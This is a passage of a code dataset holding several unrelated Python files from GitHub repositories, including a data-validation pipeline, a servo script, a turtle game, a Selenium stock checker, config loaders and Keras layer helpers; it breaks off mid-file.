regex defined to validate filename\n print(\"creating manual regex for filename validation\")\n regex = self.raw_data.manualRegexCreation()\n print(\"amnual regex created\")\n #validating filename of prediction files\n print(\"validating file name\")\n 
self.raw_data.validationFileNameRaw(regex,LengthOfDateStampInFile,LengthOfTimeStampInFile)\n print(\"filename validated\")\n #validating column length in the file\n print(\"validating column lenght\")\n self.raw_data.validateColumnLength(noofcolumns)\n print(\"column length validated\")\n #validating if any column has all values missing\n print(\"column length validated\")\n print(\"validating missing values\")\n self.raw_data.validateMissingValuesInWholeColumn()\n print(\"missing values validated\")\n print(\"raw data validation complete\")\n\n #create database with given name, if present open the connection! Create table with columns given in schema\n data_db = {'objective': 'rawdata', 'message': \"Creating Prediction database Table\",\n 'time': dt.now().strftime(\"%d/%m/%Y %H:%M:%S\")}\n self.db_obj.insert_data(data_db)\n print(\"start creating prediction DataBase\")\n\n table = self.dBOperation.createTableDb('PredictionData')\n\n print(\"prediction table created\")\n data_db = {'objective': 'rawdata', 'message': \"Table Creation Completed for prediction\",\n 'time': dt.now().strftime(\"%d/%m/%Y %H:%M:%S\")}\n self.db_obj.insert_data(data_db)\n data_db = {'objective': 'rawdata', 'message': \"Insertion of data into Table Started for Prediction\",\n 'time': dt.now().strftime(\"%d/%m/%Y %H:%M:%S\")}\n self.db_obj.insert_data(data_db)\n\n # insert csv files in the table\n print(\"Inserting good data in table\")\n self.dBOperation.insertIntoTableGoodData(table)\n print(\"Good data is inserted into table\")\n data_db = {'objective': 'rawdata', 'message': \"Insertion of data into Table Completed for Prediction\",\n 'time': dt.now().strftime(\"%d/%m/%Y %H:%M:%S\")}\n self.db_obj.insert_data(data_db)\n print(\"done\")\n\n except Exception as e:\n raise e\n","repo_name":"shahriarkasib/cementStrengthPrediction","sub_path":"prediction_Validation_Insertion.py","file_name":"prediction_Validation_Insertion.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74817833011","text":"#!/usr/bin/env python3\nimport os, logging\nfrom argparse import ArgumentParser\nfrom mg996r import MG996R\n\nstart_degree = 360\nstate_file = '.servo-state'\n\nif __name__ == '__main__':\n # set logging level\n logging.basicConfig(level=logging.DEBUG)\n\n # parse arguments\n parser = ArgumentParser()\n parser.add_argument('--deg', type=int, required=True)\n parser.add_argument('--pin', type=str, default='PA6',\n help='GPIO pin to use')\n parser.add_argument('--reset', action='store_true',\n help=f'Use clean default state (degree = {start_degree})')\n args = parser.parse_args()\n\n # restore previous degree from a file\n if not args.reset:\n try:\n if os.path.exists(state_file):\n with open(state_file, 'r') as f:\n start_degree = int(f.read())\n if not 0 <= start_degree <= 360:\n raise ValueError(f'invalid degree value in {state_file}')\n except (IOError, ValueError) as e:\n logging.exception(e)\n\n servo = MG996R(args.pin, start_degree)\n servo.move(args.deg)\n\n # save degree to a file\n try:\n with open(state_file, 'w') as f:\n f.write(str(args.deg))\n except IOError as e:\n logging.exception(e)\n","repo_name":"gch1p/opi-mg996r","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36030818463","text":"import time\n# from tqdm import tqdm\nimport multiprocessing as mp\n\n\nclass 
OP():\n    def __init__(self):\n        # use the list() and dict() proxies provided by a multiprocessing Manager directly;\n        # a single Manager instance backs both proxies\n        self.manager = mp.Manager()\n        self.mp_lst = self.manager.list()\n        self.mp_dict = self.manager.dict()\n        self.length = 64\n\n    def proc_func(self, i, j):\n        self.mp_lst.append(i)\n        self.mp_dict[i] = j\n        time.sleep(0.1)\n\n    def flow(self):\n        pool = mp.Pool(16)\n        for i in range(self.length):\n            pool.apply_async(self.proc_func, args=(i, i*2))\n        pool.close()\n        pool.join()\n\n\nif __name__ == '__main__':\n\n    start_time = time.time()\n    op = OP()\n    op.flow()\n    print(op.mp_lst)\n    print(op.mp_dict)\n    print(time.time() - start_time)","repo_name":"Chengxiaosa/sus","sub_path":"backend/resources/sus_crawler/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"7606855448","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\ntourtoise = Player()\ncar_manager = CarManager()\nscore = Scoreboard()\n\n\nscreen.listen()\n\nscreen.onkey(fun=tourtoise.move, key=\"Up\")\n\ngame_is_on = True\nwhile game_is_on:\n    time.sleep(0.1)\n    screen.update()\n\n    car_manager.create_car()\n    car_manager.move_cars()\n\n    # Detect collision with cars\n    for car in car_manager.all_cars:\n        if car.distance(tourtoise) < 20:\n            game_is_on = False\n            score.game_over()\n\n    # Detect when player reached finish line\n    if tourtoise.ycor() > 260:\n        tourtoise.go_to_start()\n        car_manager.level_up()\n        score.increase_score()\n\n\n\nscreen.exitonclick()\n","repo_name":"dbanisor/turtle_crossing_game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"36465030345","text":"#\n# * Core 65, Most Frequent Digit Sum\n# * Medium\n\n# * A step(x) operation works like this: it changes a number x into x - s(x), \n# * where s(x) is the sum of x's digits. You like applying functions to numbers, \n# * so given the number n, you decide to build a decreasing sequence of numbers: \n# * n, step(n), step(step(n)), etc., with 0 as the last element.\n\n# Building a single sequence isn't enough for you, so you replace all elements of \n# the sequence with the sums of their digits (s(x)). Now you're curious as to which \n# number appears in the new sequence most often. 
If there are several answers, \n# return the maximal one.\n\n# * Example\n\n# For n = 88, the output should be\n# mostFrequentDigitSum(n) = 9.\n# Here is the first sequence you built: 88, 72, 63, 54, 45, 36, 27, 18, 9, 0;\n# And here is s(x) for each of its elements: 16, 9, 9, 9, 9, 9, 9, 9, 9, 0.\n\n# As you can see, the most frequent number in the second sequence is 9.\n\n# For n = 8, the output should be\n# mostFrequentDigitSum(n) = 8.\n# At first you built the following sequence: 8, 0\n# s(x) for each of its elements is: 8, 0\n\n# As you can see, the answer is 8 (it appears as often as 0, but is greater than it).\n\n# * Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] integer n\n# Guaranteed constraints:\n# 1 ≤ n ≤ 105.\n\n# [output] integer\n# The most frequent number in the sequence s(n), s(step(n)), s(step(step(n))), etc.\n\n#%%\n\n# * Solution 1\ndef mostFrequentDigitSum(n: int) -> int:\n\n # * helper \n def s(n:int) -> int:\n sum = 0\n while n > 0:\n sum += n%10\n n //= 10\n\n return sum\n\n\n # numbers = []\n # numbers.append(n)\n sx = []\n\n while n > 0:\n sn = s(n)\n sx.append(sn)\n n = n - sn\n # numbers.append(n)\n \n sx.append(0)\n\n # print(numbers)\n print(sx)\n\n count = {}\n for x in sx:\n if x in count:\n count[x] += 1\n else:\n count[x] = 1\n \n maxKey = float('-inf')\n maxValue = float('-inf')\n for k, v in count.items():\n if v > maxValue or (v == maxValue and k > maxKey):\n maxValue = v\n maxKey = k\n\n return maxKey\n\n\n\n\na1 = 88\nr1 = mostFrequentDigitSum(a1)\nprint(r1)\n\na1 = 17\nr1 = mostFrequentDigitSum(a1)\nprint(r1)\n\n# a1 = 99999\n# r1 = mostFrequentDigitSum(a1)\n# print(r1)\n\n\n# %%\n","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Core/C65MostFrequentDigitSum.py","file_name":"C65MostFrequentDigitSum.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22427789739","text":"import os\nimport yaml\nfrom typing import List\n\nfrom codelearn.base import CONFIG_PATH\n\nclass Config:\n def __init__(\n self,\n allowed_licenses: List[str], \n allowed_size: int = 200 * 1024, \n space_size: int = 1024 * 1024,\n github_token = None,\n max_clean_threadshold_size: int = 800 * 1024 * 1024,\n after_cleaned_threadshold_size: int = 600 * 1024 * 1024,\n limit_api_token: bool = False,\n api_token_limit_size: int = 2 * 1024,\n ):\n self.allowed_licenses = allowed_licenses\n self.allowed_size = allowed_size\n self.space_size = space_size\n if not github_token:\n github_token = os.environ.get('GITHUB_TOKEN')\n self.github_token = github_token\n self.enable_licenses = True\n self.max_clean_threadshold_size = max_clean_threadshold_size\n self.after_cleaned_threadshold_size = after_cleaned_threadshold_size\n self.limit_api_token = limit_api_token\n self.api_token_limit_size = api_token_limit_size\n\ndef load_config(file_name: str) -> Config:\n # 获取当前脚本所在目录\n dir_path = os.path.dirname(os.path.abspath(__file__))\n file_path = os.path.join(dir_path, file_name)\n \n with open(file_path, 'r') as file:\n data = yaml.safe_load(file)\n return Config(**data)\n\nproject_config = load_config(CONFIG_PATH)","repo_name":"FISHers6/CodeLearn-Agent","sub_path":"codelearn/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11902583762","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for WooYun project\n#\n# For 
simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'WooYun'\n\nSPIDER_MODULES = ['WooYun.spiders']\nNEWSPIDER_MODULE = 'WooYun.spiders'\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'WooYun (+http://www.yourdomain.com)'\n\nITEM_PIPELINES = {\n 'WooYun.pipelines.JsonWriterPipeline': 300,\n # 'WooYun.pipelines.MongoDBPipeline':800,\n # 'myproject.pipelines.JsonWriterPipeline': 800,\n}\n","repo_name":"fsxchen/ScrapyWooYun","sub_path":"WooYun/WooYun/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12814265051","text":"# Alex Cheung s\n# web scraper using selenium webdriver\nfrom selenium import webdriver\n\n# time sleep \n# or import time; time.sleep(5) \nfrom time import sleep\n\n# https://stackoverflow.com/questions/69418411/how-to-get-rid-of-response-messages-initiating-google-chrome-using-chromedriver\n#from selenium.webdriver.chrome.options import Options\n# for getting rid of print statements from machine to help clear my debugs\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n\n\n# MAY VARY BETWEEN USERS\n# load default profile instead of canonical form\n# chrome profile data in chrome://version/ in address bar\n# C:\\Users\\Acai\\AppData\\Local\\Google\\Chrome\\User Data\n#options.add_argument(r\"user-data-dir=C:\\Users\\Acai\\AppData\\Local\\Google\\Chrome\\User Data\")\n# couldnt get to work along with driver PATH\n\n\n# headless chrome \n#options.add_argument(\"--headless\")\n\n# my laptop chromedriver path to use\nPATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\n# options for getting rid of response messages\ndriver = webdriver.Chrome(executable_path=PATH, options=options)\n\n# open google.com website\n#driver.get(\"https://google.com\")\n\n# driver title, url, window id\n# print(driver.title)\n# print(driver.current_url)\n#print(driver.current_window_handle)\n\n# refresh page\n# driver.refresh()\n\n# box lunch tanjiro dragon\n# driver.get(\"https://www.boxlunch.com/product/funko-pop-animation-demon-slayer-kimetsu-no-yaiba-tanjiro-kamado-water-breathing-glow-in-the-dark-vinyl-figure---boxlunch-exclusive/13399920.html\")\n# hot topic tanjiro training\n# driver.get(\"https://www.hottopic.com/product/funko-demon-slayer-kimetsu-no-yaiba-pop-animation-tanjiro-with-mask-vinyl-figure-hot-topic-exclusive/13412216.html\")\n\n'''\ntry:\n in_stock = driver.find_element_by_class_name('color-green')\n print(\"DEBUG:\", in_stock.text)\nexcept:\n print(\"DEBUG: no color-green class\")\n'''\n\n# Wishlist check in stock orders instead of individual websites: can check all at once\n# hot topic and box lunch have essentially the same websites (sister companies)\n# In stock: \"is-in-stock\"\n# Presale: \"on-order\"\n# Out of stock: \"notavailable\"\n\n# potential: somehow clear cache after each refresh? 
If needed\n# Will take longer to load but will always display most up to date\n\ncounter = 2\nstill_searching = True\nwhile (counter > 0 and still_searching):\n print(\"DEBUG: counter:\", counter)\n # hot topic wishlist\n driver.get(\"https://www.hottopic.com/showotherwishlist?WishListID=aeff70bb93d57f2d850769dc99\")\n try: \n # in stock \n can_buy = driver.find_element_by_class_name('is-in-stock')\n still_searching = False\n print(\"DEBUG: HT IN STOCK!\")\n except:\n # presale\n try: \n can_buy = driver.find_element_by_class_name('on-order')\n still_searching = False\n print(\"DEBUG: HT CAN PRESALE!\")\n except:\n print(\"DEBUG: HT no stock\")\n\n # box lunch wishlist\n driver.get(\"https://www.boxlunch.com/showotherwishlist?WishListID=a9eb980965a10adbfc6edb0556\")\n try: \n # in stock\n can_buy = driver.find_element_by_class_name('is-in-stock')\n still_searching = False\n print(\"DEBUG: BL IN STOCK!\")\n except:\n # presale\n try: \n can_buy = driver.find_element_by_class_name('on-order')\n still_searching = False\n print(\"DEBUG: BL CAN PRESALE\")\n except:\n print(\"DEBUG: BL no stock\")\n\n counter -= 1\n sleep(0)\n\n\n\n'''\ncounter = 1\nwhile (counter != 0):\n print(\"DEBUG: counter:\", counter)\n # box lunch tanjiro dragon\n driver.get(\"https://www.boxlunch.com/product/funko-pop-animation-demon-slayer-kimetsu-no-yaiba-tanjiro-kamado-water-breathing-glow-in-the-dark-vinyl-figure---boxlunch-exclusive/13399920.html\")\n try: \n add_to_cart = driver.find_element_by_id('add-to-cart')\n print(\"DEBUG: IN STOCK\")\n print(\"DEBUG: ADD TO CART ID:\", add_to_cart.text)\n except:\n print(\"DEBUG: NO ADD TO CART ID\")\n\n # hot topic tanjiro training\n driver.get(\"https://www.hottopic.com/product/funko-demon-slayer-kimetsu-no-yaiba-pop-animation-tanjiro-with-mask-vinyl-figure-hot-topic-exclusive/13412216.html\")\n try: \n add_to_cart = driver.find_element_by_id('add-to-cart')\n print(\"DEBUG: IN STOCK\")\n print(\"DEBUG: ADD TO CART ID:\", add_to_cart.text)\n except:\n print(\"DEBUG: NO ADD TO CART ID\")\n\n counter -= 1\n sleep(5)\n'''\n\n'''\ntry: \n add_to_cart = driver.find_element_by_id('add-to-cart')\n print(\"DEBUG: ADD TO CART ID:\", add_to_cart)\nexcept:\n print(\"DEBUG: NO ADD TO CART ID\")\n'''\n\n\nif (still_searching):\n print(\"DEBUG: searches ended: nothing in stock\")\nelse:\n print(\"SOMETHING IS IN STOCK!\")\nprint(\"DEBUG: DONE WITH PROGRAM\")\n\n# sleep 5 seconds\n# sleep(5)\n\n# close tab\n#driver.close()\n\n# close window and end process\ndriver.quit()\n\n# end of program","repo_name":"AlexKCheung/Web-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33658717274","text":"import tkinter as tk\nfrom PIL import ImageTk, Image\nimport cv2\nfrom filters_live.video_filtering_face import video_filtering_face,change_filter\nfrom tkinter_custom_button import TkinterCustomButton\nfrom tkinter import Tk\nfrom tkinter.ttk import Frame, Label\nfrom background_live.request_image import add_path,check_image\n\nsave = False\ncount_filter = -1\ncount_back = 0\nshow_filter_live = False\nshow_background_live = False\n\n\n\n\ndef camera(newWindow):\n app = Frame(newWindow)\n app.pack()\n lmain = Label(app)\n lmain.pack()\n\n def on_closing(top):\n top.destroy()\n\n\n def printInput():\n add_path(inputtxt2.get(1.0, \"end-1c\"))\n\n inputtxt2 = tk.Text(newWindow,\n height=1,\n width=20)\n inputtxt2.place(x=400,y=550)\n printButton = 
TkinterCustomButton(master=newWindow,text=\"Add New Background\", corner_radius=5, command=printInput,\n fg_color=\"#FF5C58\",hover_color=\"#ff544f\",width=150,cursor=\"shuttle\", text_font=(\"sans-serif\", 10))\n printButton.place(x=408,y=570)\n\n def nextback():\n global count_back, show_background_live\n len_image = check_image()\n if count_back == len_image:\n show_background_live = False\n count_back = 0\n else:\n count_back += 1\n show_background_live = True\n\n def nextWindow():\n global count_filter, show_filter_live\n if count_filter == len(change_filter) - 1:\n show_filter_live = False\n count_filter = -1\n else:\n count_filter += 1\n show_filter_live = True\n\n # def saveWindow():\n\n\n\n importButton = TkinterCustomButton(master=newWindow,text=\"Next background\", corner_radius=5, command=nextback,\n fg_color=\"#FF5C58\",hover_color=\"#ff544f\",\n width=300,\n cursor=\"shuttle\", text_font=(\"sans-serif\", 20))\n importButton.place(x=500,y=490)\n importButton = TkinterCustomButton(master=newWindow,text=\"Next filter\", corner_radius=5, command=nextWindow,\n fg_color=\"#FF5C58\",hover_color=\"#ff544f\",\n width=300, cursor=\"shuttle\", text_font=(\"sans-serif\", 20))\n importButton.place(x=160,y=490)\n image = tk.PhotoImage(file='../assest/camera.png')\n importButton = TkinterCustomButton(master=newWindow, corner_radius=20,\n command=lambda:open_popup(newWindow), fg_color=\"#f1f1f1\", hover_color=\"#c1c1c1\", cursor=\"shuttle\",\n image=image,\n width=50)\n importButton.place(x=740,y=431)\n\n def video_stream3():\n\n frame = video_filtering_face(\n change_filter[count_filter]['filter'],\n change_filter[count_filter]['center'],\n change_filter[count_filter]['width'],\n change_filter[count_filter]['height'],\n change_filter[count_filter]['up'],\n change_filter[count_filter]['left'],\n f'../assest/background/back{count_back}.png',\n 1,show_filter_live,show_background_live\n\n )\n\n cv2image2 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img2 = Image.fromarray(cv2image2)\n imgtk2 = ImageTk.PhotoImage(image=img2)\n lmain.imgtk = imgtk2\n lmain.configure(image=imgtk2)\n if save:\n save_image(frame)\n lmain.after(1, video_stream3)\n def save_image(frame):\n global save\n save = False\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n path_name(frame)\n\n def print_path2(inputtxt, frame):\n global top\n name = inputtxt.get(1.0, \"end-1c\")\n img_name = f\"../saved/{name}.png\"\n cv2.imwrite(img_name, frame)\n inputtxt.delete('1.0', tk.END)\n on_closing(top)\n\n newWindow.geometry(\"960x630\")\n newWindow.bind(\"\", lambda x: nextWindow())\n newWindow.bind(\"\", lambda x: nextback())\n video_stream3()\n top =''\n def open_popup(newWindow):\n global top\n top = tk.Toplevel(newWindow)\n top.geometry(\"250x150\")\n top.title(\"save\")\n global save\n save = True\n\n def path_name(frame):\n global top\n inputtxt = tk.Text(top,\n height=5,\n width=20)\n\n inputtxt.pack()\n printButton = TkinterCustomButton(master=top,text=\"Save Image\", corner_radius=5, command=lambda: print_path2(inputtxt, frame), fg_color=\"#2da44e\",\n hover_color=\"#24843f\", width=150,cursor=\"shuttle\", text_font=(\"sans-serif\", 20))\n printButton.pack()\n\n# 
newWindow.mainloop()\n\n\n","repo_name":"Python-Hiss/Filteristic","sub_path":"Tkinter/GUI_Live.py","file_name":"GUI_Live.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12000967918","text":"import os\nfrom configparser import ConfigParser\n\nCONFIG_FILE_NAME = 'client.conf'\nCONFIG_PATH_PREFIX = '.config/osh'\n\n\nconf = None\n\n\nclass Conf:\n def __init__(self, system_conf=None):\n self.conf = self.load_config()\n self.system_conf = system_conf\n\n def get_conf_dir(self):\n \"\"\"\n If conf dir does not exist, create it\n return full path to conf dir ( ~/.config/osh/ )\n \"\"\"\n config_dir = os.path.join(os.path.expanduser('~'), CONFIG_PATH_PREFIX)\n if not os.path.exists(config_dir):\n os.makedirs(config_dir)\n return config_dir\n\n def get_config_file(self):\n \"\"\"\n Returns path where configuration file lives.\n Path is /.config/osh/config.conf\n \"\"\"\n config_path = os.path.join(self.get_conf_dir(), CONFIG_FILE_NAME)\n\n if not os.path.exists(config_path):\n config = ConfigParser()\n config.add_section('General')\n # fedora-rawhide-x86_64 is set at /etc/osh/client.conf\n # user should decide what they want in their own conf file\n config.set('General', 'DefaultMockConfig', '')\n\n with open(config_path, 'w') as f:\n config.write(f)\n\n return config_path\n\n def load_config(self):\n \"\"\"\n load configuration and return ConfigParser object\n \"\"\"\n cf = self.get_config_file()\n config = ConfigParser()\n config.read(cf)\n return config\n\n def get_default_mockconfig(self):\n \"\"\"\n Return name of default MockConfig\n \"\"\"\n def_config = self.conf.get('General', 'DefaultMockConfig')\n if not def_config:\n def_config = self.system_conf['DEFAULT_MOCKCONFIG']\n return def_config\n\n\ndef get_conf(system_conf=None):\n global conf\n if conf is None:\n conf = Conf(system_conf)\n return conf\n","repo_name":"openscanhub/openscanhub","sub_path":"osh/client/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"10381189701","text":"import os\nfrom apis.api_factory import ArxivAPI, ClinicalTrialsAPI, JSONPlaceholderAPI, NHANESApi, NewsApi, OpenWeatherAPI, PubMedAPI, WikipediaAPI, YelpFusionAPI\n\nclass APIDispatcher:\n def __init__(self, api_name):\n self.api_name = api_name\n self.api = self.get_api()\n \n def get_api(self):\n if self.api_name == \"yelp\":\n YELP_API_KEY = os.getenv(\"YELP_API_KEY\", \"\")\n return YelpFusionAPI(YELP_API_KEY)\n elif self.api_name == \"arxiv\":\n return ArxivAPI()\n elif self.api_name == \"wikipedia\":\n return WikipediaAPI()\n elif self.api_name == \"openweather\":\n OPENWEATHER_API_KEY = os.getenv(\"OPENWEATHER_API_KEY\", \"\")\n return OpenWeatherAPI(OPENWEATHER_API_KEY)\n elif self.api_name == \"jsonplaceholder\":\n return JSONPlaceholderAPI(\"foo\")\n elif self.api_name == \"nhanes\":\n return NHANESApi()\n elif self.api_name == \"newsapi\":\n NEWS_API_KEY = os.getenv(\"NEWS_API_KEY\", \"\")\n return NewsApi(NEWS_API_KEY)\n elif self.api_name == \"pubmed\":\n PUBMED_API_MAIL = os.getenv(\"PUBMED_API_MAIL\", \"\")\n return PubMedAPI(PUBMED_API_MAIL)\n elif self.api_name == \"clinicaltrials\":\n return ClinicalTrialsAPI()\n else:\n raise ValueError(\"Invalid API name.\")\n \n def make_api_call(self, *args):\n return 
self.api.make_api_call(*args)\n","repo_name":"mtrsklnkvMM/babygpt","sub_path":"apis/api_dispatcher.py","file_name":"api_dispatcher.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40710108424","text":"\"\"\"\n\nNotes\n-----\n在这个模块中, 我们引入了时间统计的装饰子\n\"\"\"\n\nfrom functools import wraps\nfrom timeit import default_timer as dtimer \n\ndef timer(func):\n \"\"\"\n Notes\n -----\n 测试函数运行的墙上时间。\n \"\"\"\n @wraps(func)\n def run(*args, **kwargs):\n start = dtimer()\n val = func(*args, **kwargs)\n end = dtimer()\n print('run {} with time:'.format(func.__name__), end - start)\n return val \n return run \n","repo_name":"weihuayi/fealpy","sub_path":"fealpy/decorator/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"zh","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"41971901413","text":"\nimport tensorflow as tf\nfrom keras import backend as K\n#from keras.engine.topology import Layer\nfrom tensorflow.python.keras.layers import Layer\nfrom keras.layers import ZeroPadding2D, Cropping2D\nfrom keras.layers import Activation, BatchNormalization, Conv2D, Lambda, UpSampling2D, Input, Conv2DTranspose, MaxPooling2D, Dropout\nfrom keras.layers import concatenate, add, average, multiply\n\ndef mvn(tensor):\n '''Performs per-channel spatial mean-variance normalization.'''\n epsilon = 1e-6\n mean = K.mean(tensor, axis=(1,2), keepdims=True)\n std = K.std(tensor, axis=(1,2), keepdims=True)\n mvn = (tensor - mean) / (std + epsilon)\n \n return mvn\n\ndef crop(tensors):\n '''\n List of 2 tensors, the second tensor having larger spatial dimensions.\n '''\n h_dims, w_dims = [], []\n for t in tensors:\n b, h, w, d = t._keras_shape\n h_dims.append(h)\n w_dims.append(w)\n crop_h, crop_w = (h_dims[1] - h_dims[0]), (w_dims[1] - w_dims[0])\n rem_h = int(crop_h % 2)\n rem_w = int(crop_w % 2)\n tt_h = int(crop_h / 2)\n tt_w = int(crop_w / 2)\n crop_h_dims = (tt_h, tt_h + rem_h)\n crop_w_dims = (tt_w, tt_w + rem_w)\n cropped = Cropping2D(cropping=(crop_h_dims, crop_w_dims))(tensors[1])\n \n return cropped\n\nclass MaxPoolingWithIndices(Layer):\n def __init__(self, pool_size,strides,padding='SAME',**kwargs):\n super(MaxPoolingWithIndices, self).__init__(**kwargs)\n self.pool_size=pool_size\n self.strides=strides\n self.padding=padding\n return\n def call(self,x):\n pool_size=self.pool_size\n strides=self.strides\n if isinstance(pool_size,int):\n ps=[1,pool_size,pool_size,1]\n else:\n ps=[1,pool_size[0],pool_size[1],1]\n if isinstance(strides,int):\n st=[1,strides,strides,1]\n else:\n st=[1,strides[0],strides[1],1]\n output1,output2=tf.nn.max_pool_with_argmax(x,ps,st,self.padding)\n return [output1,output2]\n def compute_output_shape(self, input_shape):\n if isinstance(self.pool_size,int):\n output_shape=(input_shape[0],input_shape[1]//self.pool_size,input_shape[2]//self.pool_size,input_shape[3])\n else:\n output_shape=(input_shape[0],input_shape[1]//self.pool_size[0],input_shape[2]//self.pool_size[1],input_shape[3])\n return [output_shape,output_shape]\n\n\nclass UpSamplingWithIndices(Layer):\n def __init__(self, **kwargs):\n super(UpSamplingWithIndices, self).__init__(**kwargs)\n return\n def call(self,x):\n argmax=K.cast(K.flatten(x[1]),'int32')\n max_value=K.flatten(x[0])\n with tf.compat.v1.variable_scope(self.name):\n input_shape=K.shape(x[0])\n batch_size=input_shape[0]\n image_size=input_shape[1]*input_shape[2]*input_shape[3]\n 
output_shape=[input_shape[0],input_shape[1]*2,input_shape[2]*2,input_shape[3]]\n indices_0=K.flatten(tf.multiply(K.reshape(tf.range(batch_size),(batch_size,1)),K.ones_like((1,image_size),dtype='int32')))\n indices_1=argmax%(image_size*4)//(output_shape[2]*output_shape[3])\n indices_2=argmax%(output_shape[2]*output_shape[3])//output_shape[3]\n indices_3=argmax%output_shape[3]\n indices=tf.stack([indices_0,indices_1,indices_2,indices_3])\n output=tf.scatter_nd(K.transpose(indices),max_value,output_shape)\n return output\n def compute_output_shape(self, input_shape):\n shape_x, shape_argmax = input_shape\n return shape_x[0],shape_x[1]*2,shape_x[2]*2,shape_x[3]\n\ndef standard_block(input_tensor, stage, nb_filter, kernel_size=3, act = 'relu', thickness = 2, kernel_reg = None, normalize_layer = None):\n x = input_tensor\n\n if thickness == 0:\n return x\n \n for i in range(thickness):\n x = Conv2D(nb_filter, (3,3), name='conv'+stage+'_'+str(i+1), kernel_initializer = 'he_normal', padding='same', kernel_regularizer = kernel_reg)(x)\n #x = Dropout(dropout_rate, name='dp'+stage+'_'+str(i+1))(x)\n if normalize_layer == 'bn':\n x = BatchNormalization(name = 'bn'+stage+'_'+str(i+1))(x)\n elif normalize_layer == 'mvn':\n x = Lambda(mvn, name = 'lambda'+stage+'_'+str(i+1))(x)\n x = Activation(act, name='act'+stage+'_'+str(i+1))(x)\n\n return x\n\ndef standard_block_t2(input_tensor, stage, nb_filter, kernel_size=3, act = 'relu', thickness = 2, kernel_reg = None, normalize_layer = None):\n x = input_tensor\n\n if thickness == 0:\n return x\n \n for i in range(thickness):\n x = Conv2D(nb_filter, (kernel_size, kernel_size), name='conv'+stage+'_'+str(i+1), activation = act, kernel_initializer = 'he_normal', padding='same', kernel_regularizer = kernel_reg)(x)\n #x = Dropout(dropout_rate, name='dp'+stage+'_'+str(i+1))(x)\n if normalize_layer == 'bn':\n x = BatchNormalization(name = 'bn'+stage+'_'+str(i+1))(x)\n elif normalize_layer == 'mvn':\n x = Lambda(mvn, name = 'lambda'+stage+'_'+str(i+1))(x)\n\n return x\n\ndef expend_as(tensor, rep, name):\n my_repeat = Lambda(lambda x, repnum: K.repeat_elements(x, repnum, axis=3), arguments={'repnum': rep},\n name='psi_up' + name)(tensor)\n return my_repeat\n\ndef AttnGatingBlock(x, g, inter_shape, name, normalize_layer = 'bn'):\n ''' take g which is the spatially smaller signal, do a conv to get the same\n number of feature channels as x (bigger spatially)\n do a conv on x to also get same geature channels (theta_x)\n then, upsample g to be same size as x\n add x and g (concat_xg)\n relu, 1x1 conv, then sigmoid then upsample the final - this gives us attn coefficients'''\n\n shape_x = K.int_shape(x) # 32\n shape_g = K.int_shape(g) # 16\n\n theta_x = Conv2D(inter_shape, (2, 2), strides=(2, 2), padding='same', name='xl' + name)(x) # 16\n shape_theta_x = K.int_shape(theta_x)\n\n phi_g = Conv2D(inter_shape, (1, 1), padding='same')(g)\n upsample_g = Conv2DTranspose(inter_shape, (3, 3),\n strides=(shape_theta_x[1] // shape_g[1], shape_theta_x[2] // shape_g[2]),\n padding='same', name='g_up' + name)(phi_g) # 16\n\n concat_xg = add([upsample_g, theta_x])\n act_xg = Activation('relu')(concat_xg)\n psi = Conv2D(1, (1, 1), padding='same', name='psi' + name)(act_xg)\n sigmoid_xg = Activation('sigmoid')(psi)\n shape_sigmoid = K.int_shape(sigmoid_xg)\n upsample_psi = UpSampling2D(size=(shape_x[1] // shape_sigmoid[1], shape_x[2] // shape_sigmoid[2]))(sigmoid_xg) # 32\n\n upsample_psi = expend_as(upsample_psi, shape_x[3], name)\n y = multiply([upsample_psi, x], name='q_attn' + 
